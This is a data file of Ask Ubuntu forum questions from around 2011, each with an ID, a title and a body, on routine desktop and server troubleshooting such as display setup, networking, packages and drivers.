53935	how to make programs that autostart at login start hidden ?	how do i start applications that autostart on login start hidden in the system tray ? is there special command ( i.e . -- hidden ) to the autostart command to make the application start to the system tray ? i know in kubuntu 11.04 kwin allows `` special windows settings '' to set a specific rule to start an application minimized but have n't seen any rule to start to tray . i 'm looking to start mobloquer to the system tray on login , but a more general method to solve this problem that applies to all programs would be very much appreciated .
53937	what to install for mysql ?	i am going to learn mysql by myself , so i would like to install mysql on . but there are many applications related to mysql in synaptics . i was wondering what are some basic applications to be installed ? consider these two cases : mysql for webserver use , or mysql not for webserver use . will the packages to be installed for the two cases be different ? thanks and regards !
53946	why does unplugging my laptop trigger a 'lid close ' event ?	ever since switching my acer aspire one d150 laptop over to 11.04 full-time , i 've noticed that whenever i remove the ac adapter plug from the computer it goes into standby immediately . this happens regardless of how long it 's been charging . some quick searching yielded this launchpad report , but it 's been closed for some time with no solution posted . i 've got a simple workaround by setting the 'lid close ' event in the power manager to simply turn the screen off . is there a known fix for this or should i open a new issue ?
53951	allow incoming calls to interrupt mobile broadband connection	i 've moved into a new apartment where i ca n't get decent internet . however , i can connect via my mobile edge network . just one problem : when someone tries to call my cell phone when i am connected , they can not get through , and i never know about the call . if i use the phone 's own browser/email and it connects to edge , an incoming call will interrupt the connection . this is what i want . is there a way to enable this in ubuntu ? ( i used the 'mobile broadband ' section of the network manager to set-up the connection . )
53952	are there any advantages to using the firefox ppa over firefox in the repository ?	is there any advantage to using `` ppa : mozillateam/firefox-stable '' over just using what 's available in the repositories for 11.04 ?
53956	how can i enable core dump ?	i 've edited /etc/security/limits.conf and change the first line to # < domain > # < type > # < item > # < value > * soft core unlimited but the vmware.log of vmware workstation still says : no core dump taken . the core dump size limit is zero . is there any other setting i should modify ? thanks . p.s . : i 'm using ubuntu 11.04 64 bit , 2.6.38-generic .
53965	how to automatically install entire google web fonts collection ?	i 'm basically looking for an unattended way to deploy/install the google web fonts collection into several ubuntu boxes . i 've searched for ppas , packages or user scripts but without much luck . any advice will be much appreciated . thanks a lot in advance !
53969	is ccleaner beneficial for ubuntu ?	i want use ccleaner on ubuntu 10.04 . but i do not know whether it is necessary or not . is it necessary ? are there any benefits from using it ?
53971	separate x screen + twinview on nvidia gt 440	i want to use 3 displays connected on one nvidia geforce gt 44o under ubuntu 10.04 . so there is my configuration : 1 display 1680x1050_60 1 display 1280x1024_60 1 dlp 1920x1080_60 ( video projector ) i want to have the two display in twinview mode ( extended desktop ) and have the projector on a separate x screen in order to launch xbmc at boot on it . when i try to configure displays as said previously in nvidia-settings , i can not activate 3 displays at the same time nor use `` twinview '' and `` separate x screen '' at the same time . is it possible to do what i want ? if yes could you give me the xorg configuration ? thank you in advance .
53974	why does unity 2d have `` real time '' window updating when resizing window and unity 3d does not ?	unity 3d just shows orange square when resizing window . and since i 'm not native english speaker , here is a screenshot showing what i 'm trying to explain :
53976	ssh connection error : no route to host	there are three machines in this scenario : desktop a : user @ 1.23.x.x laptop a : user @ 1.23.y.y machine b : user @ 192.168.z.z all the machines have ubuntu 11.04 ( desktop a is a 64bit one ) and have both openssh-server and openssh-client . now when i try to connect desktop a to laptop a or vice-versa by ssh user @ 1.23.y.y i get an error as port 22 : no route to host in both the cases . i own both the machines , now if i try same commands from my friend 's machine , i.e . via desktop b , i can access both my laptop and desktop . but if i try to access desktop b from my laptop or by desktop i get port 22 : connection timed out i even tried changing ssh port no . in ssh_config file but no success . note : that 'laptop a ' uses wifi connection while 'machine a ' uses ethernet connection and 'machine b ' is on an entirely different network . @ lekensteyn here it is - > laptop a & & desktop a - > router/nano_rcvr provided to me by isp . so to one router two machines are connected and can be accessed at the same time . here is my ifconfig output for both the machines : - laptop wlan0 link encap : ethernet hwaddr x : x : x : x:00 : bc inet addr:1.23.73.111 bcast:1.23.95.255 mask:255.255.224.0 inet6 addr : fe80 : :219 : e3ff : fe04 : bc/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:108409 errors:0 dropped:0 overruns:0 frame:0 tx packets:82523 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:44974080 ( 44.9 mb ) tx bytes:22973031 ( 22.9 mb ) desktop eth0 link encap : ethernet hwaddr x : x : x : x : c5:78 inet addr:1.23.68.209 bcast:1.23.95.255 mask:255.255.224.0 inet6 addr : fe80 : :227 : eff : fe04 : c578/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:10380 errors:0 dropped:0 overruns:0 frame:0 tx packets:4509 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1790366 ( 1.7 mb ) tx bytes:852877 ( 852.8 kb ) interrupt:43 base address:0x2000 output of ip route show 1.23.64.0/19 dev wlan0 proto kernel scope link src 1.23.73.111 metric 2 169.254.0.0/16 dev wlan0 scope link metric 1000 output of traceroute -n 1.23.73.111 traceroute to 1.23.73.111 ( 1.23.73.111 ) , 30 hops max , 60 byte packets 1 1.23.68.209 3008.787 ms ! h 3008.786 ms ! h 3008.784 ms ! h
53977	how do i force detection of an unrecognized keyboard while booted in the live cd ?	i am trying ubuntu netbook 10.10 on a lenovo ideapad s10-3c . in live mode it has not detected the entire keyboard . no num keys on ... how to make the keypad working in live mode ? will it remain undetected if i make ubuntu permanent on my laptop ? please help me . any type of guidelines , links , code work with detailed instructios is welcome . ( i have written above matter with onboard - typing utility ) .
53978	notebook is booting when battery is removed	i installed ubuntu on my notebook , when i was using windows it booted fine , but after change os , sometimes it only boots if i remove battery , is there any solution i can fix it here is output of dmesg , unfortunately i could n't paste output here it 's more that 30000 charachters
53980	how to delete all the settings for deja dup	when i upgraded to 11.04 deja dup started behaving strangely , it would begin a new full backup everytime the computer was started because it was looking for a drive and folder which i had removed some months earlier . deja dup had behaved perfectly normal under 10.10 , but the upgrade seems to have it using old settings . so i was wondering how can i purge all the configuration files and folders so that next time i reinstall deja dup it starts using and remembering the settings i want ? i can not find any folders in /home/username/.config or in the home folder , but on each install something is telling deja dup to look at old settings . any help would be great !
53982	how to remove subvol from partition ?	i installed natty 64-bit with btrfs filesystem only to find that it takes almost two minutes to boot . i tried a few different things , and finally today opened up /etc/fstab only to find the following : uuid=b22ac5c7-e294-4d62-8189-6a3707148927 / btrfs defaults , subvol= @ 0 1 uuid=b22ac5c7-e294-4d62-8189-6a3707148927 /home btrfs defaults , subvol= @ home 0 2 uuid=24b7732d-f2f4-43a2-85c1-05b889a56524 none swap sw 0 0 i only vaguely remember the installation process , but it seemed pretty simple at the time , and i do n't remember creating any sub volumes . i tried editing the first two entries to show a single entry ( with lzo compression ) : uuid=b22ac5c7-e294-4d62-8189-6a3707148927 / btrfs defaults , compress=lzo 0 1 and it wound me up with nothing in my home directory , but booted much faster than before , just over one minute . so , my question is , how do i go about putting / and /home on a single volume in fstab , rather than two subvolumes ?
53983	turning meego into ubuntu or lubuntu	practical question : i have meego pre-installed and working fine on my lenovo s10 . with fresh-installed lubuntu some devices are not working . i do n't like meego interface . if i uninstall it 's graphical interface and install lxde or ubuntu-package will it work ? thanks a lot for reading this
53984	who owns ubuntu and the ownership of ubuntu as a going concern	possible duplicates : who pays for ubuntu ? ubuntu finances and future of project ? how does ubuntu make money ? as i read mark shuttlesworth ( hope i got it correct ) is the one calling the shots through his owned created trust ( god bless him ) . my question is that what will happen if he ( god forbid ) suddenly withdraws his funds from the ubuntu project ?
53996	running xubuntu without panels	i 'm running xubuntu with awn and i would like to turn off all the xfce panels , but it does not allow me to do so with the last one . is there any way to do it ?
53997	which keyboard layout to choose for an hp g42-330br ?	i 've a hp g42-330br ( brazilian version ) which layout to choose ? at the moment it 's a 105 layout . i tried several combinations but can not change it to the layout of the notebook .
53998	successfully installed 11.04 64bit on two amd 32bit laptops -- how is that possible ? & differences between i386 and amd64 ?	just as the title reads i ca n't quite understand how it works flawlessly . from what i know the 32bit os works on both 32bit & 64bit processors but 64bit os only work on 64bit . so how is it possible that it works ? i also noticed , when downloading the iso , from the ubuntu site that the 64bit version had some 'amd64 ' along its name and the 32bit version 'i386 ' . does the 'i ' stand for intel ?
54008	what 's the best lightweight dock for lubuntu ?	i 'm looking for a dock supporting not only launchers but also a list of currently running apps that is fairly lightweight and suited for lubuntu install .
54009	configuring kubuntu to avoid mouse moving off the right edge of the screen	i just installed kubuntu . the hardware includes two current generation ati graphics cards in crossfire configuration . i have only one monitor plugged in . kubuntu 's display and monitor settings correctly identifies that i have only one screen ; the multiple monitors section says so directly . nevertheless , when i move my cursor past the right edge of the screen , it can move what appears to be approximately one full screen width beyond my visible desktop . i have also observed one program centering a message in a location that appears to be centered at the right edge of my screen , i.e in the middle of my actual monitor and the imaginary monitor . i guess there are some settings somewhere , used only by the mouse and this one program , that thinks there is a second monitor . how can i fix this ? edit to add xrandr output : screen 0 : minimum 320 x 200 , current 1280 x 1024 , maximum 1280 x 1280 dfp1 disconnected ( normal left inverted right x axis y axis ) dfp2 disconnected ( normal left inverted right x axis y axis ) dfp3 disconnected ( normal left inverted right x axis y axis ) dfp4 disconnected ( normal left inverted right x axis y axis ) dfp5 connected 1280x1024+0+0 ( normal left inverted right x axis y axis ) 375mm x 301mm 1280x1024 60.0*+ 75.0 72.0 70.0 1280x960 72.0 75.0 70.0 60.0 1152x864 72.0 75.0 70.0 60.0 1280x768 72.0 75.0 70.0 60.0 1280x720 72.0 75.0 70.0 60.0 1024x768 72.0 75.0 70.1 60.0 800x600 70.0 72.2 75.0 60.3 56.2 640x480 70.0 75.0 72.8 67.0 59.9 dfp6 disconnected ( normal left inverted right x axis y axis ) crt1 disconnected ( normal left inverted right x axis y axis ) ... and xorg.cfg section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 screen `` aticonfig-screen [ 1 ] -0 '' rightof `` aticonfig-screen [ 0 ] -0 '' endsection section `` module '' load `` glx '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 1 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` aticonfig-device [ 1 ] -0 '' driver `` fglrx '' busid `` pci:2:0:0 '' endsection section `` screen '' identifier `` default screen '' defaultdepth 24 endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` aticonfig-screen [ 1 ] -0 '' device `` aticonfig-device [ 1 ] -0 '' monitor `` aticonfig-monitor [ 1 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection
54010	do i need to setup a `` zone '' for every domain name that is visible to the outside world ?	i have a quick question . i just setup dns on one of our ubuntu servers using bind9 . now my question is do we need to setup a `` zone '' for every domain name that is visible to the outside world ? or is there another option ? what are the best practices for setting up different domains in bind9 ?
54013	gparted black screen after waking up	i am running gparted with a live cd 11.04 . since it 's a long job the screen goes into power save mode . when i move the mouse the screen comes back but the display is black and the cursor looks like the editing cursor ( i shape ) . i think the process is still running because i can see the hd light blinking . it 's been more than a day that the process is running so i was wondering if there is a way to know the status because the black screen with the editing cursor looks like a freeze . is there a way to refresh the screen ? update in a terminal ctrl+alt+1 i ran the command sudo fdisk -l and for the hd i partitioned i got : /dev/sdb1 * 1 120901 971128832 83 linux /dev/sdb2 120901 121538 5118976 5 extended /dev sdb3 121538 121602 513024 83 linux /dev/sdb5 120901 121538 5117952 82 linux swap / solaris the partitioning i asked for was : primary of around 950 gb ( do n't remember the exact number ) extended for the swap of 5 gb i feel that gparted is done but i want to make sure before rebooting the system . what do you think ?
54014	`` unusable '' space installing ubuntu 11.04 beside windows 7 - but it 's the only space i have !	i 'm attempting to install ubuntu on my laptop to dual boot with windows 7 . i have a single 320gb hard drive with the following breakdown : sda1 ( fat16 ) 41.1 mb ( not sure what this one is for ) sda2 ( ntfs ) 104.9 mb ( not sure what this one is for either ) sda3 ( ntfs ) 64.4 gb ( windows 7 is installed here ) sda4 ( ntfs ) 220.0 gb ( separate partition where i keep photos , music , etc ... ) free space 35.5 gb ( `` unusable '' ? ? ? ) i was planning to install ubuntu on those 35.5 gb of space , but when attempting to do so it says that the space is `` unusable '' . it wo n't let me format or do anything else with it . what can i do ?
54017	install spideroak & keep ubuntu one ?	i want to know if it is possible to install spideroak and keep my ubuntu one together . i love u1 but with spideroak i get security and well another 2gb cloud space . do n't think i will be doing this because i have tons of space with u1 still , but think it is a question worth asking . can spideroak and u1 work in harmony on the same machines ? ( not even considering dropbox , but i guess the more i can find out the better . )
54018	ubuntu one contacts with notes	there is a major issue with the notes section on the online contacts site after syncing with facebook . it seems to import fine however when i remove the text in the notes section it keeps bringing it back . i have turned of sync now and i have to add a small character to everyone of the contacts for which notes were imported . is this a known issue and is there a way to resolve it ?
54019	error when installing nfs-kernel-server	i continue to get this error when trying to install following : root @ 127 : /home/gordon # sudo apt-get install nfs-kernel-server reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libnfsidmap2 librpcsecgss3 nfs-common portmap the following new packages will be installed : libnfsidmap2 librpcsecgss3 nfs-common nfs-kernel-server portmap 0 upgraded , 5 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/367 kb of archives . after this operation , 1,491 kb of additional disk space will be used . do you want to continue [ y/n ] ? y preconfiguring packages ... selecting previously deselected package libnfsidmap2 . ( reading database ... 252530 files and directories currently installed . ) unpacking libnfsidmap2 ( from ... /libnfsidmap2_0.23-2_i386.deb ) ... dpkg : unrecoverable fatal error , aborting : fork failed : can not allocate memory e : sub-process /usr/bin/dpkg returned an error code ( 2 ) root @ 127 : /home/gordon # is it a package problem or a memory problem ?
54027	where can i get a usb remote control with arrow keys that map to the arrow keys on the keyboard ?	i 'll like to control my evince pdf viewer with a compact remote control with arrows on it that simply act like arrow keys on any linux compatible wireless keyboard . where can i get one of these .
54030	upgrade a kernel when in chroot . how to ?	i am trying to build a custom cd using uck . now , i want to upgrade the kernel , remove the old kernel and then create the iso . i am able to upgrade the kernel but i am not able to switch to the new kernel as i can not reboot ( as its a chroot session ) . is it possible to switch to the new kernel and remove the old kernel ?
54032	compiling avld on 11.04	i 'm trying to install avld 1.4 on natty . i 've unpacked the files , but when i compile them with make , it fails : make -c /lib/modules/2.6.38-8-generic-pae/build m=/home/jmendeth/downloads/avld_0.1.4 modules make [ 1 ] : entering «/usr/src/linux-headers-2.6.38-8-generic-pae» cc [ m ] /home/jmendeth/downloads/avld_0.1.4/video_device.o /home/jmendeth/downloads/avld_0.1.4/video_device.c:23:28 : fatal error : linux/videodev.h : no such file or directory compilation terminated . make [ 2 ] : *** [ /home/jmendeth/downloads/avld_0.1.4/video_device.o ] error 1 make [ 1 ] : *** [ _module_/home/jmendeth/downloads/avld_0.1.4 ] error 2 make [ 1 ] : leaving «/usr/src/linux-headers-2.6.38-8-generic-pae» make : *** [ all ] error 2 i have tried to install libv4l-0 and libv4l-dev , but still the same error . if i replace linux/videodev.h with linux/videodev2.h on the file , a lot of errors pop out . any ideas ?
54039	installing îźtorrent	hello i 'm trying to install utorrent to my ubuntu 11.04 i 'm downloading it from here . but it 's a .tar.gz file . i 'm untaring it with tar -xzvf utorrent-server-3.0-25053.tar.gz command . but there is n't any make file , etc . i can understood , how can i install it ?
54044	choppy flash video playback	i am having major choppy flash video playback issues with ubuntu 11.04 . the issue only occurs while playing flash video . it works fine in regular video playback ( divx/xvid ) . i have and have tried the following : ati radeon 4200 ( integrated graphics ) using latest ati/amd proprietary driver fglrx ran update manager amd x4 630 cpu played flash video in 360 quality latest version of 64-bit flash beta installed flash-aid installed on firefox tried in both firefox and chrome , but still laggy . attempted to make a new user account , and tried it on there , but still does n't work . tia !
54045	unable to install brother mfc7460dn network printer	i am unable to install my network printer in ubuntu 11.04 64-bit , as the driver is not available in the repository . i am using brother mfc7460dn . any help would be appreciate it . tia !
54050	trackpad stops working until reboot ( asus eeepc 900 )	i 'm running ubuntu ( natty ) on my asus eeepc 900 , and recently an interesting problem has appeared : the trackpad and its buttons sometimes stop working , and stay nonfunctional until i reboot the computer . i ca n't find anything relevant in dmesg , and i 'm not really sure where else to look for clues to the problem . what can i do to make the trackpad stop doing this ? or failing that , is there some way to `` restart '' the trackpad without rebooting the entire computer ?
54067	how do i safely change grub2 screen resolution ?	i did a fresh install of ubuntu 11.04 on a hp 550 notebook . but grub2 is n't really fit in the best screen resolution that this notebook can support ( 1280x800 ) . how can i do this without using a third party application ?
54077	how do i configure a second monitor as an independent xscreen with unity ?	i have a laptop with a nvidia g105m , the main monitor has a 1366x768 resolution and i am trying to configure an external monitor to become independent from the main monitor ( laptop screen ) . with twinview i expand the workspaces , which every time i change to another workspace it happens in both monitors and that 's not what i need , i only need the external monitor for virtualbox , mupen64plus and vlc . i ca n't use the monitor settings as it always says unknown in the monitor image . so i use the nvidia settings , where in the monitor configuration area i click detect and the 2nd monitor appears as disabled and now i can configure the 2nd monitor in twinview or separate x screen . however when i use twinview the second monitor is an extension from the 1st monitor which means that when i switch workspaces , it switches in both monitors . what i want is to have the 2nd monitor to never change workspaces so that i can always see the same window in it , be it virtualbox , vlc or terminator i looked around the forums and the questions here but did n't find anything that related to my situation .
54084	acer aspire one keyboard	help ! keyboard is messed up after plugging in a desktop keyboard . example . `` qwerty456* [ ] asdfgh123-'\ zxcvbn0 , . '' can not write without pressing the fn key for messed up 2eys ! `` he3* 0e *3ease ! ''
54089	why does 11.04 freezes randomly	we 're running ubuntu 11.04 on quite a few dell machines , but i am noticing that on some of them ( including mine ) ubuntu freezes on randomly . normally when the screen goes to lock mode and you press a key to wake it up , this will happen . only mouse cursor can be moved but nothing else can even be clicked . the only way out is to either go to terminal with ctrl + alt + f1 key and re-login , or do a hard shut down . has anyone else also seen this happening ? what 's the cause and solution/prevention ! ?
54095	how to install driver for amd radeon hd6470m	i 've just bought new laptop asus k42j with no os pre-installed . i had installed ubuntu 10.04 on it . everything is fine excluding video card performance - it looks like wide screen pulled on horizontal . i had checked monitor preferences - there is appears only one resolution 1024x768 4:3 . as far as i understood it a driver 's issue . there were n't any problems during installations - open-source driver has been installed automatically . i 'd tried to check `` additional drivers '' section , but it does n't offer me any additional drivers for installation . i had downloaded the driver from here but now i do n't know how to istall it on ubuntu . i 'm newbie on linux and irt looks a bit complicated for me : ) i tried some tricks mentioned on another posts but with no result . i 'll be very appriciated for any help .
54100	is there hope for having an ubuntu theme that looks like unity 's context-menu theme ?	i like the transparent + gradient + dots theme . will canonical implement a system-wide theme that is similar ?
54101	how do i get a tata docomo usb modem working ?	i have a usb tata docomo ( usb modem to connect internet ) lsusb shows bus 002 device 003 : id 05c6:9000 qualcomm , inc. let me know how can my usb mode it work in ubuntu 10.04 64 bit . as per this blog i have been able to configure http : //ershadk.wordpress.com/2010/03/30/connect-tata-docomo-internet-in-ubuntu-9-04/ upto step 4 , but not able to find antenna icon in system tray . there is one signal kind of wireless icon on top right hand corner which connects when i get a wifi network . if author is referring to that , but not able to get my usb modem there even though i have followed upto step 4 correctly on above blog and usb is connected.how to start or connect let me know if some one has done it previously . i would like to directly use as per the instruction on above blog as people have been able to use it .
54102	how does unity launcher choose which window to show when multiple windows are in the same group ?	for example , in firefox , if i have a main window and the source code window ( ctrl+u ) , and both are minimized , clicking on the firefox icon in the launcher will make one window appear . how does unity choose which one ? is there a way to change the `` default '' window ?
54104	get a launcher on the unity launcher that shows all connected drives/devices in a quicklist	i have had the thought of adding a single icon/launcher to my unity launcher . just a single icon that when clicked or right click it shows the mounted drives in a quicklist and allows me to open the drive/device { even if clicking does nothing and the only way to get the quickest or menu is to right click the the icon would be super } i was thinking maybe creating a .desktop file and use a script to do the dirty work would be a way to achieve this . it does not have to be anything fancy i 'd just like to try and get something that will do the job . i 'm thinking just a single icon on the launcher that does nothing when clicked but right clicking it shows a quicklist of all mounted drives would be the easiest way ? . i am only new to ubuntu and linux and i would like to ask if someone would be kind enough to please try their best to help and make this idea work ? as i 'm sure there has to be a way it can be done , as i said before it do n't have to be fancy at all , if it 's crude but works that is fine by me . thank you for your time ray .
54105	wifi not working when on battery	my wifi gets disabled when my netbook is not connected to a power source . or more specific wifi is active but i ca n't browse the net when disabled . i 'm using ubuntu 11.04 on my asus eee pc . i have posted a question regarding this on https : //answers.launchpad.net/ubuntu/+question/166232
54106	how do i enable power management on ubuntu server ?	i have ubuntu server 11.04 installed on an old noisy laptop . its only purpose is to run subversion and i commit code quite rarely , but the laptop should work all the time . so i would like to know how to turn on power management features for ubuntu server to enable automatic cpu scaling ( reduce noise and heat ) and make system power off display .
54108	interface trouble , eth1 does n't exist	i add in virtualbox 2 interfaces like bridge , internal network 192.168.. and external 195 ... * internal config : auto eth0 iface eth0 inet static address 192.168 . *.250 netmask 255.255.255.0 network 192.168 . *.0 broadcast 192.168 . *.255 gateway 192.168 . *.254 external config : auto eth1 iface eth1 inet static address 195.* . *.182 netmask 195 . *.255.248 network 195.* . *.176 broadcast 195.* . *.183 gateway 195.* . *.177 now if i restart the networking eth0 successfull is up , but eth1 make the error : root @ tudor-lx : /home/theo # /etc/init.d/networking restart * running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces * reconfiguring network interfaces ... siocsiifaddr : no such device eth1 : error while getting interface flags : no such device soicsifnetmask : no such device siocsifbrdaddr : no such device eth1 : error while getting interface flags : no such device eth1 : error while getting interface flags : no such device failed to bring up eth1 . ssh stop/waiting ssh start/running , process 1260
54115	how to remotely enable connecting to the main desktop	first let me state my problem i need to be able to remotely log into the main desktop . by main i mean this . i have vnc and nx setup . if i 'm locally logged in i can then remotely connect to that main desktop with either vnc or nx . from that vnc or nx i can run apps that use the gpu ..on the other hand.. if i connect vnc or nx to a new desktop that desktop is running purely in software and has no access to the gpu . i 'm not near my desktop . in fact i 'm 8000 miles from it and will be for 2 months . how can i start the main desktop remotely ( effectively how can i get the system to login in as though i was locally at the computer ) so that i can then vnc or nx to the running main desktop note : this is a work computer so auto-login is not an option . some ideas that so far have no panned out . 1 ) turn on xdmcp via gdmsetup running gdmsetup from a non main display never unlocks . no idea why 2 ) turn on xdmcp remotely every page i 've seen so far is from 2007 and does not remotely match what i see . specifically they all mention a gdm.conf . there is no gdm.conf on my system . there is /etc/gdm but none of the files look like the ones mentioned in 4 years old pages . i 'm even sure doing that will fix the problem . 3 ) get vnc to run before gdm starts the was similar . docs were old . not sure how to do this ( or if it will work ) ideally i 'd do this by some how pinging the gdm login screen remotely with like ssh me @ remote magic-gdm-login-cmd -- user me password : mypassword and like magic , it was as though i had flown 8000 miles , logged in and flown back to where i am now ( asia ) other solutions are welcome though .
54116	find the correct package for a given font ?	today i did a fresh install of ubuntu 10.04 . in my .xdefaults file there are following lines : urxvt*font : -adobe-courier-medium-r-normal -- 24-240-75-75-m-150-iso8859-1 urxvt*boldfont : -adobe-courier-bold-r-normal -- 24-240-*-*-*-*-iso8859-1 now urxvt only starts if i comment out those lines . i think the reason is that the adobe-courier font seems to be not installed as xlsfonts|grep adobe|grep courier -bitstream-courier 10 pitch-bold-i-normal -- 0-0-0-0-m-0-adobe-standard -bitstream-courier 10 pitch-bold-r-normal -- 0-0-0-0-m-0-adobe-standard -bitstream-courier 10 pitch-medium-i-normal -- 0-0-0-0-m-0-adobe-standard -bitstream-courier 10 pitch-medium-r-normal -- 0-0-0-0-m-0-adobe-standard shows . xfont-base , xfont-100dpi and xfont-75dpi are installed . now my question is , how to find out which package contains the desired font .
54120	how to get rid of transmission zombie process ?	problem : i was downloading a file over transmission when i noticed that the transmission window was grayed out and not responding . on clicking it , ubuntu ( 10.04 ) asked to force-close which i did . what remains is a zombie process that uses 100 % of 1 cpu , and that 's pretty much stopping my little machine dead in its tracks . top and system monitor look very much the same as the screenshots in this related question . steps taken : i tried right-clicking the zombie in system monitor and select `` kill '' but nothing happened . rebooting seems to work , except that it happens again when i restart transmission . i see in system monitor that it has a pid , 5 digits . i tried sudo kill { the pid } but nothing happened . ( i do n't know my way around linux so i did n't try kill with any parameters . ) now , i 'm simply not starting transmission again until i know how to deal with this . i 'm guessing that if i remove all transmission downloads and reboot , then it would work again , perhaps until i try download some problematic file again ? question : it 's clear that i ca n't kill this zombie without rebooting . ( or can i ? ) how can i avoid this zombie ? what is causing transmission to break down ? update 1 : i now tried sudo kill -9 { the pid } and it did n't seem to do anything . a minute later the zombie was gone , and the grey transmission window too . i started transmission again , and it seems to run now . very odd ? update 2 : i just waited a looong time , and it seems to have cleared itself up . wondering if perhaps i was just being impatient , but i thought that an intel i5 with 2gb ram ought to be able to handle simple browsing plus transmission . should i just delete this question ? it seems to have imploded . update 3 : this seems to be unrelated to number of downloads ( i had only one active ) , and to rate limits ( it happened in both cases ) . but it 's difficult to give useful updates , as it seems to be working fine now . i 'll reboot and start transmission again , then see if it misbehaves again .
54122	determining number of files in ubuntu one	is there a way of telling in ubuntu one how many files i have in each folder without having to do a manual count ?
54123	permission denied error in transmission after formatting drive to ext4	i use transmission to download torrents to /media/serier/ ( so not my home folder ) . i did this before and it worked , but after formating my drive to ext4 i get a permissions error . this is what i get from ls -la in /media/serier/serier/ : drwx -- -- -- 2 user user 4096 2011-03-30 19:32 folder.name and i believe that transmission is run by me ( user ) . ps -ef | grep trans user 26076 1 0 00:23 ? 00:00:56 transmission-gtk how do i fix this ? change the permission for the folder ? update : ok , i have changed permission to several folders now , but it still does not work . here it is : /media : drwxr-xr-x 7 root root 4096 2011-07-21 22:26 media /media/serier/ drwxr-xr-x 5 user user 4096 2011-07-22 14:02 serier /media/serier/serier/*720 drwxr-xr-x 103 user user 12288 2011-07-20 22:25 serier ( attempting to download a episode of alphas ) /media/serier/serier/alphas season 1/ drwxr-xr-x 3 user user 4096 2011-07-14 20:27 alphas season 1 i still get this error message : error : permission denied ( /media/serier/serier/alphas season 1/alphas.s1e02.720 ... ) every folder is owned by me ( user ) except for media owned by root and every folder is set to drwxr-xr-x . why do i still get an error message ? ! ps . changed the download location to : drwxr-xr-x 3 user user 16384 2011-07-22 18:21 downloads and it works , but i do n't want to download it to my home folder and move the file every time i download something.. thanks for the fast response by the way..
54129	can you recommend any program for downloading mms/rtmp files	for rtmp , i already tried rtmpdump , it 's very difficult and complicated to use in terminal is there a gui based alternative ... for mms , i already tried firefox 's plugin , and some download manager , it download only junk file or stream file not full at all and saving with vlc it work 's but takes a very long time to do ( i think vlc is converting file format after downloaded , can i save without converting ? ) p.s . and i can not add tags mms and rtmp because my reputation less than 300 . thank you ! p.s.2 ( thanks allan for edited my terrible english . ) this is examples link that i got problems . removed my personal links
54131	install programs like apple do	why not let us install programs the same way apple do ? one file and thats it and if one wants to uninstall , just delete the file/folder .
54132	how to become a ubuntu developer ?	i have some knowledge in shell programming , and lot of interest in using ubuntu os . i have to go deeper as a programmer for ubuntu . what i have to know and wt is the proper way ?
54133	installing tomcat and more on a remote virtual machine	my university has setup an account for me on a virtual machine running ubuntu . i am able to connect to the machine using winscp with the ssh address of the server provided to me . now i would like to install basic server softwares like tomcat etc on the system , but i am not sure how to install software on a remote virtual machine .
54134	how to install logmein on ubuntu linux 10.04	i am beginning to use the remote access tool , logmein , and i love it . i am currently managing a windows 2003 server with logmein , and now i would like to add another server which is a ubuntu linux 10.04 . at the logmein website they appear to have some beta versions of their client software available for linux , but it says that they are command line only and i am not familiar with how to install them . does anyone have any ideas how i can install the client software for logmein on this ubuntu linux 10.04 machine ? thanks .
54139	git-ls-files : command not found	i googled this command and it said it is provided via git-man , which i have installed . anybody having issues with this command not being found ? it appears based on git-ls-files manpage that we can use git ls-files . however , this breaks existing tool . is there a workaround for this ? /usr/bin/git-ls-files # ! /usr/bin/bash git ls-files $ args ?
54142	how can i make ubuntu compatible with baudline ?	when i run baudline , it displays the message `` all input devices disabled '' and the input â¸ devices screen does n't list any devices . the baudline faq suggests : here are two possible explanations for this : you do n't have a properly configured audio card . or you do n't have read and write privileges for /dev/audio or /dev/mixer . the observation that sound works in every other program i 've tried ( though there is one exception ) strongly suggests that my sound card is properly configured . the problem appears to be related to /dev/audio and /dev/mixer . i 'm certain that i do not have read and write privileges for them , because they do n't even exist . i think this bug report is responsible for their absence , but i 'm not sure what it means for me . i have used baudline in ubuntu in past years without any problems . how can i make ubuntu 's sound configuration compatible with baudline again ?
54145	how to fix strange backspace behaviour with urxvt + zsh ?	i use urxvt in combination with zsh . however since my fresh install of ubuntu 10.04 i have the following problem . if i type backspace the cursor moves to the right ( instead of deleting the characters on the left ) . suppose i typed n characters then pressing backspace n-times moves the cursor n- positions to the left , if i type backspace then one more , the cursor does n't move anymore . if i type the left arrow , nothing happens , if i type the right arrow afterwards a some character occurs . mv .zshrc .zshrc.bak mv .xdefaults .xdefaults.bak did n't help . urxvt + bash works fine as well as xterm + zsh . zsh-version : 4.3.11-4ubuntu2.is.3ubuntu1 rxvt-unicode version : 9.09-3 any idea how to fix this ?
54148	is there any way i can get scrybe ( gesture workflow technology ) ?	scrybe is a program powered by synaptics for touch pad to use it like gesture workflows . is there any way that i can use it in ubuntu ? if not , is there an equivalent software ready to use ?
